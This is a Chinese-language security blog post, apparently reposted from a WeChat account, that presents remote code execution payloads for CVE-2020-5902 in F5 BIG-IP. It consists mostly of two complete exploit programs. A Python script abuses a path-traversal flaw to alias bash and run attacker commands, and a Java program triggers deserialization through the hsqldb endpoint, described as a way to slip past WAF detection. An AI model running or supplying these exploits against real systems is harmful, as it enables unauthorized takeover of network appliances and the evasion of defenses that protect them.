cve-2020-5902 RCE的payload以及绕过方式

  • A+
所属分类:安全文章

通过bash执行命令的 payload

通过alias = bash去绕过无法执行shell的限制。payload如下

#coding:utf-8
import requests
import json
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
import uuid
import sys

# tmshCmd.jsp?command=create+cli+alias+private+list+command+bash
# fileSave.jsp?fileName=/tmp/cmd&content=id
# tmshCmd.jsp?command=list+/tmp/cmd
# tmshCmd.jsp?command=delete+cli+alias+private+list

banner = r'''
_______ _______ ______ _________ _______ _________ _______ _______ _______ _______
( ____ ( ____ ( ___ __ __/( ____ __ __/( ____ ) ( ____ )( ____ ( ____
| ( /| ( / | ( ) ) ) ( | ( / ) ( | ( )| | ( )|| ( /| ( /
| (__ | (____ | (__/ / | | | | | | | (____)| | (____)|| | | (__
| __) (_____ | __ ( | | | | ____ | | | _____) | __)| | | __)
| ( ) ) | ( | | | | _ ) | | | ( | ( ( | | | (
| ) /____) ) | )___) )___) (___| (___) | ___) (___| ) | ) __| (____/| (____/
|/ ______/ |/ ___/ _______/(_______) _______/|/ |/ __/(_______/(_______/

CVE-2020-5902 UnAuth RCE Vuln
Python By Jas502n
From: https://github.com/rapid7/metasploit-framework/blob/0417e88ff24bf05b8874c953bd91600f10186ba4/modules/exploits/linux/http/f5_bigip_tmui_rce.rb
____________________________________________________________________________________________________________________________________________________
'''


def tmshCmd_exit(url,file,cmd):
tmshCmd_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash"
proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}
r = requests.get(tmshCmd_url,verify=False,allow_redirects=False)
# r = requests.get(tmshCmd_url,verify=False,allow_redirects=False,proxies=proxies)

response_str = json.dumps(r.headers.__dict__['_store'])
# print type(response_str)
# print response_str
if r.status_code == 200 and 'tmui' in response_str:
# print tmshCmd_url
print "[+] tmshCmd.jsp Exit!"
print "[+] create cli alias private list command bash n"
# cmd = 'whoami'
upload_exit(url,file,cmd)


else:
print "[+] tmshCmd.jsp No Exit!n"

def upload_exit(url,file,cmd):
fileSave_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/%s&content="%file + cmd
proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}
r = requests.get(fileSave_url,verify=False,allow_redirects=False)
# r = requests.get(fileSave_url,verify=False,allow_redirects=False,proxies=proxies)
response_str = json.dumps(r.headers.__dict__['_store'])
if r.status_code == 200 and 'tmui' in response_str:
# print fileSave_url
print "[+] fileSave.jsp Exit!n"
list_command(url,file)
else:
print "[+] fileSave.jsp No Exit!n"

def list_command(url,file):
rce_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/%s" % file
proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}
r = requests.get(rce_url,verify=False,allow_redirects=False)
# r = requests.get(rce_url,verify=False,allow_redirects=False,proxies=proxies)
response_str = json.dumps(r.headers.__dict__['_store'])
# print len(r.content)
if r.status_code == 200 and 'tmui' in response_str:
if len(r.content) > 33:
# print rce_url
print "[+] Command Successfull !n"
command_result = json.loads(r.content)
print "_"*90,'nn'
print command_result['output']
print "_"*90,"nn"
delete_list(url)
else:
print "[+] Command Failed !n"

def delete_list(url):
delete_url = url + '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list'
proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}
r = requests.get(delete_url,verify=False,allow_redirects=False)
# r = requests.get(delete_url,verify=False,allow_redirects=False,proxies=proxies)
response_str = json.dumps(r.headers.__dict__['_store'])
if r.status_code == 200 and 'tmui' in response_str:
# print delete_url
print "[+] delete cli alias private list Successfull! n"
else:
print "[+] delete cli alias private list Failed! n"


if __name__ == '__main__':
print banner
while 1:
url = "https://x.x.x.x/"
# url = sys.argv[1]
file = str(uuid.uuid1())
print "/tmp/" + file,"n"
cmd = raw_input("[+]Set Cmd= ")
print
tmshCmd_exit(url,file,cmd)

通过java反序列化绕过waf的payload

上一种payload特征明显,很容易被waf等设备拦截。在这里我们可以使用java反序列化配合cve 2020-5902去执行命令。做到隐藏特征以绕过waf。
cve-2020-5902 RCE的payload以及绕过方式

代码如下

/*
Exploit Title: F5 BIG-IP Remote Code Execution
Date: 2020-07-06
Authors: Charles Dardaman of Critical Start, TeamARES
Rich Mirch of Critical Start, TeamARES
CVE: CVE-2020-5902
Requirements:
Java JDK
hsqldb.jar 1.8
ysoserial https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
*/


import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.Statement;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.io.IOException;
import org.hsqldb.lib.StringConverter;

public class f5RCE {

public static void main(String[] args) {
Connection connection;
Statement statement;

if(args.length != 2) {
System.err.println("nUsage: <hostname> <payload.txt>n");
System.exit(1);
}
String server = args[0];
String pfile = args[1];
String payload = null;

try {
payload = new String(Files.readAllBytes(Paths.get(pfile)));
payload = payload.replaceAll("(\n|\r)","");
} catch (IOException e) {
e.printStackTrace();
}

String dburl = "jdbc:hsqldb:https://" + server +
":443/tmui/login.jsp/..%3b/hsqldb/";

System.out.println("Connecting to " + server);
try {
Class.forName("org.hsqldb.jdbcDriver");
connection = DriverManager.getConnection(dburl, "sa","");
statement = connection.createStatement();
statement.execute("call "java.lang.System.setProperty"('org.apache.commons.collections.enableUnsafeSerialization','true')");
statement.execute("call "org.hsqldb.util.ScriptTool.main"('" + payload +"');");
} catch (java.sql.SQLException sqle) {
// ignore java.sql.SQLException: S1000
// General error java.lang.IllegalArgumentException: argument type mismatch
if(sqle.getSQLState().equals("S1000") && sqle.getErrorCode() == 40) {
System.out.println("Payload executed");
} else {
System.out.println("Unexpected SQL error");
sqle.printStackTrace();
}
return;
}
catch (ClassNotFoundException cne) {
System.err.println("Error loading db driver");
cne.printStackTrace();
return;
}
}
}

参考

  1. https://github.com/jas502n/CVE-2020-5902/blob/master/CVE-2020-5902.py

  2. https://github.com/Critical-Start/Team-Ares/blob/master/CVE-2020-5902/f5RCE.java

cve-2020-5902 RCE的payload以及绕过方式


本文始发于微信公众号(宽字节安全):cve-2020-5902 RCE的payload以及绕过方式

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: